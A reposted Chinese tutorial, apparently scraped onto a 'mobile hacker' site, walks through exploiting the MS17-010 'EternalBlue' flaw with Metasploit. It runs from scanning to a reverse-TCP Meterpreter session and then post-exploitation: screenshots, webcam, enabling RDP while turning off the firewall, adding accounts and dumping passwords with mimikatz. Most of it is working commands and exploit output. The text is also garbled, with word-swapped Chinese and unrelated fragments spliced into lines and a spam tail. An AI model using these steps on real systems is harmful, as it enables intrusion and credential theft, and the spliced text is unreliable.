手机黑客网:MSF结构完成“永久之蓝”的闪电进犯

访客4年前 (2020-01-15)黑客资讯433

在NSA东西箱刚刚放出来的时分，我们都在学习怎样玩转这个东西箱中的“永久之蓝”的侵犯，信任每个小伙伴学习的运用的时，都很不适应并很是花费了一番曲折才搞定它吧，而且每次运用还要预备好相应的条件，今日就跟我们同享下我们刚刚学习到运用MSF结构快速搞定“MS017-010”缝隙。

其实我们这儿所说的运用MSF 完结 “永久之蓝”的快速侵犯，就是运用Metasploit中近期更新的针对ms17-101缝隙的侵犯载荷进行侵犯获取主机操控权限。我这儿简略的记载下整个侵犯运用所需求的东西预备、运用进程以及后浸透的一些简略内容。

二、东西预备

那接下来让我们预备下相关的东西吧，信任我们必定会说，不仍是要预备环境吗，其实这个环境都是我们进程用到的根本东西环境，仅仅做下简略预备就OK了。

2.1 nmap 环境预备

（1）请将Nmap装置到当时最新版别(7.40以上)；

（2）保证 script脚本中包含 *** b-vuln-ms17-010.nse脚本；

在后面扫描检测是需求用到此脚本进行缝隙扫描检查，有关script脚本的寄存方位在Nmap装置根目录下的有个“script”目录，直接进入搜索“ms17-010”，存在则无需再下载。

（3）相关软件下载

nmap下载地址：https://nmap.org/download.html

*** b-vuln-ms17-010.nse下载地址：https://nmap.org/nsedoc/scripts/ *** b-vuln-ms17-010.html

2.2 MSF 环境预备

metasploit 其默许在kali中就自带有整个侵犯结构，后续我们对我们简称其为MSF结构。因为我们要用到针对“永久之蓝”缝隙的侵犯，故需求将MSF结构晋级到最新版别，至少在4.14.17版别以上。

2.2.1 kali环境要求

主张我们直接运用kali2.0的环境，这样后续进行MSF结构的晋级也比较便利，不容易呈现各种不知道的问题，方面我们后续浸透侵犯的打开。

（1）修改 kali 更新源

首要我配备kali的更新源：直接修改更新源的配备文件“/etc/apt/sources.list” ,然后将下面的源仿制进去保存即可。

国内kali镜像更新源：

1 2 3 4 1.#阿里云Kali源 2.deb http:贝尔金WeMo沟通机是贝尔金只能家居的一部分，用于操控开关全部链接的设备，也可以对链接的设备分配任务。下面是一些关于我侵犯的沟通机的详细配备：//mirrors.aliyun.com/kali kali main non-free contrib 3.deb-src http://mirrors.aliyun.com/kali kali main non-free contrib 4.deb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

配备完源配备文件后，直接进行更新装置，详细指令如下。

1 root@kali:~# apt-get update && apt-get upgrade && apt-get dist-upgrade

（2if (opts->deny != 0 && /* deny==0 means no deny */）更新 kali系统

kali 源更新完后，我们进kali 内核的更新，详细更办法如下。

1 root@kali:apt-get install linux-headers-$(uname -r)

注：假如报错了的话可以输入这个试试

1 aptitude -r install linux-headers-$(uname -r

2.2.2 MSF侵犯结构版别要求

MSF结构版别要求在 4.11.17版别以上，详细版别检查办法如下。

1 2 1.# msfconsole #进入结构 2.msfconsole> version

三、主机发现

关于主机的发现，我们可以运用的办法许多，这儿简略记载和阐明几种，供我们一起学习，每个人可根据主机的喜爱挑选运用。

3.1 fping

在kali 系统同自带有fping这个扫描东西，有关于主机发现的扫描指令如下。

1 fping -asg 192.168.1.0/24

3.2 nbtscan

在 kali 中自带有nbtscan这个同网段主机发现东西，有关扫描指令记载下发。

1 nbtscan -r 192.168.1.0/24

3.3 nmap

关于namp 主机发现与扫描功用的强壮，我们这儿简略了记载几种个人常用的扫描办法。

（1） ping 包扫描

1 nmap -n -sS 192.168.1.0/24

（2）指定端口发现扫描

1 nmap -n -p445 192.168.1.0/24 --open

（3）针对缝隙脚本的定向扫描

1 nmap -n -p445 --script *** b-vuln-ms17-010 192.168.1.0/24 --open

以上扫描中，针对本次演示侵犯中的主机发现扫描，个人引荐运用 nmap -n -p445 192.168.1.0/24 --open 其扫描发现的功率更高。

四、缝隙扫描

在承认政策规模中那些主机是存活后，我们可以进行定向Tor -与该操控台一起树立匿名 *** 联接445端口的缝隙脚本扫描了，直接找到存在缝隙的政策主机，为后续的MSF侵犯供给政策。

其实提到这儿，我们会发现上面第三章节“主机发现”这一步，我们可以直接越过，直接进定向445同享端口的缝隙扫描，上面之所以写出了，也是为了自己今后的学习和运用做一个笔记和记载。

4.1 Nmap 缝隙扫描

MS17-101缝隙定向扫描指令如下：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 nmap -n -p445 --script *** b-vuln-ms17-010 192.168.1.0/24 --open 1.Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-06 09:38 ?D1迆㊣那℅?那㊣?? 2.Nmap scan report for 192.168.1.1 3.Host is up (0.00088s latency). 4.PORT STATE SERVICE 5.445/tcp closed microsoft-ds 6.MAC Address: 94:0C:6D:11:9F:CE (Tp-link Technologies) 7. 8.Nmap scan report for 192.168.1.103 9.Host is up (0.072s latency). 10.PORT STATE SERVICE 11.445/tcp filtered microsoft-ds 12.MAC Address: 38:A4:ED:68:9E:25 (Xiaomi Communications) 13. 14.Nmap scan report for 192.168.1.109 15.Host is up (0.0059s latency). 16.PORT STATE SERVICE 17.445/tcp closed microsoft-ds 18.MAC Address: 60:02:B4:7B:4D:93 (Wistron Neweb) 19. 20.Nmap scan report for 192.168.1.112 21.Host is up (0.0040s latency). 22.PORT STATE SERVICE 23.445/tcp open microsoft-ds 24.MAC Address: 48:D2:24:FF:6A:CD (Liteon Technology) 25. 26.Host script results: 27.| *** b-vuln-ms17-010: 28.| VULNERABLE: 29.| Remote Code Execution vulnerability in Microsoft *** Bv1 servers (ms17-010) 30.| State: VULNERABLE 31.| IDs: CVE:CVE-2017-0143 32.| Risk factor: HIGH 33.| A critical remote code execution vulnerability exists in Microsoft *** Bv1 34.| servers (ms17-010). 35.| 36.| Disclosure date: 2017-03-14 37.| References: 38.| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ 39.| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx 40.|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

经过Nmap 的445端口定向缝隙扫描发现 192.168.1.112 存在MS17-010缝隙。

4.2 MSF Auxiliary 辅佐扫描

其实假如不直接运用namp进行缝隙定向扫描，我们也可以直接运用MSF结构的辅佐模块“”auxiliary”中的扫描模块进行扫描。了解MSF的同学必定都知道，MSF的扫描模块根本也就是调用nmap扫描来完结的。这儿就简略记载下这个“auxiliary/scanner/”扫描模块的下缝隙扫描办法。

1 2 3 4 5 6 7 8 msfconsole # 进入MSF结构 version # 承认下MSF的版别 search ms17_010 # 查找缝隙模块的详细途径 use auxiliary/scanner/ *** b/ *** b_ms17_010 # 调用缝隙扫描模块 show option # 检查模块配备选项 set RHOST 192.168.1.1-254 # 配备扫描政策 set THREADS 30 #配备扫描线程 run #工作脚本

这个运用下来，我们发现其实还没有namp 一条指令就搞定了，来的便利。

五、MSF 缝隙运用进程

经过以上一切环境的预备和缝隙扫描主机的发现，接下来运用MSF结构进行MS17-10缝隙的侵犯，也就是“几秒”中的工作了，详细运用办法和进程记载如下。

5.1 ms17-010 缝隙运用之MSF运用办法

1 2 3 4 5 6 msfconsole # 进入MSF 结构 version # 保证MSF结构版别在 4.14.17以上； search ms17_010 # 缝隙模块途径查询 set exploit/windows/ *** b/ms17_010_eternalblue # 调用侵犯模块 set RHOST 192.168.1.112 # 设定侵犯政策 exploit # 建议侵犯

5.2 ms17-010 缝隙侵犯MSF结构实践记载

5.2.1 缝隙模块途径查询

5.2.2 调用和配备exploit侵犯参数

5.2.3 建议侵犯

5.2.4 获取shell

获取的shell 后，我们可以经过名getuid检查下当时用户的权限。

六、保持拜访

这儿的提到保持拜访，主要是想记载下关于运用meterpreter这个侵犯载荷模块，我们在运用缝隙的进程中，假如可以运用meterpreter侵犯载荷模块，尽量运用这个模块。

6.1 payload 侵犯载荷理论

提到这儿就就遍及下MSF结构下关于“payload”侵犯载荷的根本概念，那么什么是payload呢？

payload又称为侵犯载荷，主要是用来树立政策机与侵犯机安稳衔接的，并回来一个shell，也可以进行程序注入等，payload有3种类型。

（1）singles（独立载荷）

独立载荷，可直接植入政策系统并实行相应的程序，如：shell_bind_tcp这个payload。

（2）stagers（传输器载荷）

传输器载荷，就是用于政策机与侵犯机之间树立安稳的 *** 衔接，与传stages（输体载荷配）合侵犯。一般该种载荷体积都十分小，可以在缝隙运用后，便利进行注入，这类载荷功用都十分类似，大致分为bind型和reverse型。

bind型：需求侵犯机自动衔接政策端口的；

reverse型：政策时机反向衔接侵犯机，需求提早设定好衔接侵犯机的ip地址和端口号的配备。

（3）stages（传输体）

传输体载荷，如shell，meterpreter等。在stagers树立好安稳的衔接后，侵犯机将stages传输给政策机，由stagers进行相应处理，将操控权转交给stages。比方得到政策机的shell，或许meterpreter操控程序工作。这样侵犯机可以在本端输入相应指令操控政策机。

由此可见，meterpreter其实就是一个payload，它需求stagers（传输器）和相应的stages（传输体）合作工作，meterpreter是工作在内存中的，经过注入dll文件完结，在政策机硬盘上不会留下文件痕迹，所以在被侵略时很难找到。真因为这点，所以meterpreter十分牢靠安稳优异。

6.2 payload 侵犯载荷了解

上面说了这么多，或许我们看起来比较费力难以了解，其实简略的了解就是说payload侵犯载荷有2个大的类型：

（1）独立体（single）

从这个英文单词single,就可以大约知道这类payload是个独立，独自的意思，其真实结合界说我们就可以看出，侵犯载荷一般做两件工作

一、就是树立政策主机与侵犯主机之间的 *** 衔接；

二、就是在衔接树立的基础上获取政策主机的操控权限，即获取可供操作的shell。

（2）结合体payload

在了解了一个完好的payload是有两部分组成的基础上，我们可以了解我们这儿所说的结合体了，其实就是将本来的single独立体切割为了两个部分：“传输器载荷”与“传输体载荷”（stages & stagers）

比方“windows/meterpreter/reverse_tcp”是由一个传输器载荷（reverse_tcp）和一个传输体载荷（meterpreter）所组成的，其功用等价于独立侵犯载荷“windows/shell_reverse_tcp”

6.3 meterpreter 侵犯载荷实战

我们这儿就运用MS17-010缝隙浸透模块结合meterpreter侵犯载荷模块进行一次实战演练,经过永久之蓝缝隙我们来获取一个meterpreter，顺路看meterpreter功用的强壮之处。

其他侵犯流程与前面根本相同，唯一多了一个配备 payload侵犯载荷的进程，详细配备如下。

6.3.1 侵犯载荷配备进程

调用exploit 侵犯

1 2 use exploit/windows/ *** b/ms17_010_eternalblue set rhost 192.168.1.112

配备侵犯载荷

1 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.118

建议侵犯

1
手机黑客网:MSF结构完成“永久之蓝”的闪电进犯
exploit

获取shell

1 getuid

6.3.2 详细实操进程记载

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 1.msf > use exploit/windows/ *** b/ms17_010_eternalblue # 调用ms17-010永久之蓝缝隙侵犯模块 2.msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.112 # 设定侵犯政策 192.168.1.112 3.rhost => 192.168.1.112 4.msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # 调用反弹的侵犯载荷 5.payload => windows/x64/meterpreter/reverse_tcp 6.msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.118 # 设定将meterpreter 反弹给192.168.1.118 7.lhost => 192.168.1.118 8.msf exploit(ms17_010_eternalblue) > show options # 查询侵犯参数设置 9. 10.Module options (exploit/windows/ *** b/ms17_010_eternalblue): 11. 12. Name Current Setting Required Description 13. ---- --------------- -------- ----------- 10×05 定位回来地址方位4. GroomAllocations 12 yes Initial number of times to groom the kernel pool. 15. GroomDelta 5 yes The amount to increase the groom count by per try. 16. MaxExploitAttempts 3 yes The number of times to retry the exploit. 17. ProcessName spoolsv.exe yes Process to inject payload into. 18. RHOST 192.168.1.112 yes The target address 19. RPORT 445 yes The target port (TCP) 20. VerifyArch true yes Check if remote architecture matches exploit Target. 2内部挟制（Insider Threats, ITs）已经成为了挟制美国 *** 和企业界的首要问题，一般来说ITs首要有以下几种类型：1. VerifyTarget true yes Check if remote OS matches exploit Target. 22. 23. 24.Payload options (windows/x64/meterpreter/reverse_tcp): 25. 26. Name Current Setting Required Description 27. ---- --------------- -------- ----------- 28. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) 29. LHOST 192.168.1.118 yes The listen address 30. LPORT 4444 yes The listen port 31. 32. 33.Exploit target: 34. 35. Id Name 36. -- ---- 37. 0 Windows 7 and Server 2008 R2 (x64) All Service Packs 38. 39. 40.msf exploit(ms17_010_eternalblue) > exploit # 建议侵犯 41. 42.[*] Started reverse TCP handler on 192.168.1.118:4444 43.[*] 192.168.1.112:445 - Connecting to target for exploitation. 44.[+] 192.168.1.112:445 - Connection established for exploitation. 45.[+] 192.168.1.112:445 - Target OS selected valid for OS indicated by *** B reply 46.[*] 192.168.1.112:445 - CORE raw buffer dump (23 bytes) 47.[*] 192.168.1.112:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima 48.[*] 192.168.1.112:445 - 0x00000010 74 65 20 36 2e 31 00 te 6.1 49.[+] 192.168.1.112:445 - Target arch selected valid for OS indicated by DCE/RPC reply 50.[*] 192.168.1.112:445 - Trying exploit with 12 Groom Allocations. 51.[*] 192.168.1.112:445 - Sending all but last fragment of exploit packet 52.[*] 192.168.1.112:445 - Starting non-paged pool grooming 53.[+] 192.168.1.112:445 - Sending *** Bv2 buffers 54.[+] 192.168.1.112:445 - Closing *** Bv1 connection creating free hole adjacent to *** Bv2 buffer. 55.[*] 192.168.1.112:445 - Sending final *** Bv2 buffers. 56.[*] 192.168.1.112:445 - Sending last fragment of exploit packet! 57.[*] 192.168.1.112:445 - Receiving response from exploit packet 58.[+] 192.168.1.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! 59.[*] 192.168.1.112:445 - Sending egg to corrupted connection. 60.[*] 192.168.1.112:445 - Triggering free of corrupted buffer. 61.[*] Sending stage (1189423 bytes) to 192.168.1.112 62.[*] Meterpreter session 1 opened (192.168.1.118:4444 -> 192.168.1.112:49177) at 2017-06-07 13:42:17 +0800 63.[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 64.[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 65.[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 66. 67.meterpreter > getuid # 查询当时用户权限为SYSTEM,获取到到更高权限 68.Server username: NT AUTHORITYSYSTEM 69.meterpreter > sysinfo # 系统信息查询，当时系统为 Windows7 70.Computer : CHINAMAN-PC 71.OS : Windows 7 (Build 7600). 72.Architecture : x64 73.System Language : zh_CN 74.Domain : WORKGROUP 75.Logged On Users : 0 76.Meterpreter : x64/windows 77.meterpreter >

6.3.3 meterpreter 功用展示

（1）桌面抓图

1. meterpreter > screenshot

（2）视频敞开

1. meterpreter > webcam_scream

（3）敞开长途桌面

1. > meterpreter > run post/windows/manage/enable_rdp

2. 此指令可以帮我们一建敞开长途桌面，并帮我们封闭防火墙，真的牛xxx.

注：一开始运用指令 run getgui -u admin -p passw0rd 没能敞开长途RDP桌面，后来才查询到上面这个侵犯脚本。当然并不是说，就不能用哦。

（4）增加账号

直接进入系统shell,增加账号（效果失利）

1 2 1.> shell 2.> net user test 123 /add

3. ... # 一向没有回显，怀疑是因为装置了360导致的，后来进过验证的确是这原因，一切说装置个360仍是很有用的，不要总是说人家是流氓软件，不是打广告哈,真实感触...

（5）获取系统管理暗码

想直接增加账号进行提权，前面操作是不了，那么我们现在就出杀手锏，直接运用mimikatz来获取系统管理账号的暗码。

之一步：载入mimikatz

1. meterpreter > load mimikatz

第二步：运用指令wdigest获取暗码

1 2 3 4 5 6 7 8 9 10 11 12 13 14 1.meterpreter > wdigest 2.[+] Running as SYSTEM 3.[*] Retrieving wdigest credentials 4.wdigest credentials 5.=================== 6. 7.AuthID Package Domain User Password 8.------ ------- ------ ---- -------- 9.0;997 Negotiate NT AUTHORITY LOCAL SERVICE 10.0;996 Negotiate WORKGROUP CHINAMAN-PC$ 11.0;47327 NTLM 12.0;999 NTLM WORKGROUP CHINAMAN-PC$ 13.0;636147 NTLM ChinaMan-PC ChinaMan mima-009 14.>

注：Mimikatz 的指令协助：

1 2 3 4 5 6 7 8 9 10 11 12 1.Mimikatz Commands 2.================= 3. 4. Command Description 5. ------- ----------- 6. kerberos Attempt to retrieve kerberos creds 7. livessp Attempt to retrieve livessp creds 8. mimikatz_command Run a custom command 9. msv Attempt to retrieve msv creds (hashes) 10. ssp Attempt to retrieve ssp creds 11. tspkg Attempt to retrieve tspkg creds 12. wdigest Attempt to retrieve wdigest creds

（6）长途桌面衔接之

另敞开一个terminal，运用名rdesktop 衔接长途桌面

1 1.root# rdesktop 192.168.1.112 -u user -p passw0rd

有关meterpreter 的功用还有许多，这儿就缺乏做过多的阐明晰，就是简略记载下本次实战演练进程中遇到的各种问题和小技术有关其他的功用运用可以参阅其他文档做进一步的学习。

参阅学习

https://www.zybuluo.com/mdeditor#728079-full-reader

https://www.hx99.net/Article/Tech/201505/36750.html

http://blog.sin *** .cn/s/blog_4c86552f0102wll1.html

本文由安全客原创发布，如需转载请注明来历及本文地址。
本文地址：http://bobao.360.cn/learning/detail/3964.html

手机黑客网:MSF结构完成“永久之蓝”的闪电进犯

'outLength: ' +
手机黑客网
this.outLength +', ' +注："在cmd下转义后用"标明。除了在英雄联盟客户端内发送博彩广告外，病毒还会运用 *** 的快速登录，盗取ClientKey值，然后在空间的说说中，参与守时说说，守时发送广告：一般的，我们会去看init文件，但形似并没有问题MSF框架实现“永恒之蓝”的闪电攻击

手机黑客网3.计划规划这儿，我们枚举出了下列途径：APT，又称高级继续性挟制，一般用于区分由国家、 *** 或情报组织资助或具有相关布景的侵犯团伙实施的侵犯行为。该类侵犯行为的动机往往与地缘政治冲突，军事行为相关，并以持久性的情报打听、收集和监控为首要目的，其首要侵犯的政策除了 *** 、戎行、外交相关部门外，也包含科研、海事、动力、高新技术等领域。

echo "" > my.php

前置知识：函数实行流程rmdir：删去目录在容许子进程继续工作之前，我们将奉告操作系统tracee应该跟它的父进程一起中止。真实场景下的strace结束还需求设置其他的参数，例如PTRACE_O_TRACEFORK：手机黑客网

uint64 dummy;现在业界还有传闻称，苹果公司也将会在其下一代iPhone中引入虹膜辨认解锁功用，新一代iPhone很有或许在本年10月份发布，到时分我们也可以一起看看新款iPhone的虹膜辨认系统安全性终究怎样。总结

};33 {SWIFT文件夹包含PowerPoint演示文稿，根据，凭证和EastNets的内部架构，EastNets是中东更大的SWIFT服务商之一。其他区域：78.100.17.60MSF框架实现“永恒之蓝”的闪电攻击

手机黑客网3. 许多的ip与运用者之间没有强绑定，其他，后一节将会提到ip在身份辨认的作用上现已逐渐力不从心。幽默的是，NtQueueApcThread接受的APC函数的指针并不是调用者传递给QueueUserApc的原始A
MSF框架实现“永恒之蓝”的闪电攻击
PCProc函数指针。相反，实践传递的函数指针是ntdll!RtlDispatchAPC，而且传递给QueueUserApc的原始APCProc函数是作为参数传递给ntdll！RtlDispatchAPC的。第八步：证书申购成功后，系统会自动将证书安置到又拍云CDN途径，并与相应域名进行绑定，用户无需手动操作。可进入证书处理（https://console.upyun.com/toolbox/ssl）界面，对证书进行配备操作。首要之一个危害就是绕过windows全部的查杀机制了，就如我之前所述，这个东西归于windows底层的一个功用，现有杀毒软件无法对其进行防护。一旦恶意代码注入到白名单进程中，任何的查杀机制都无法自动进行防护。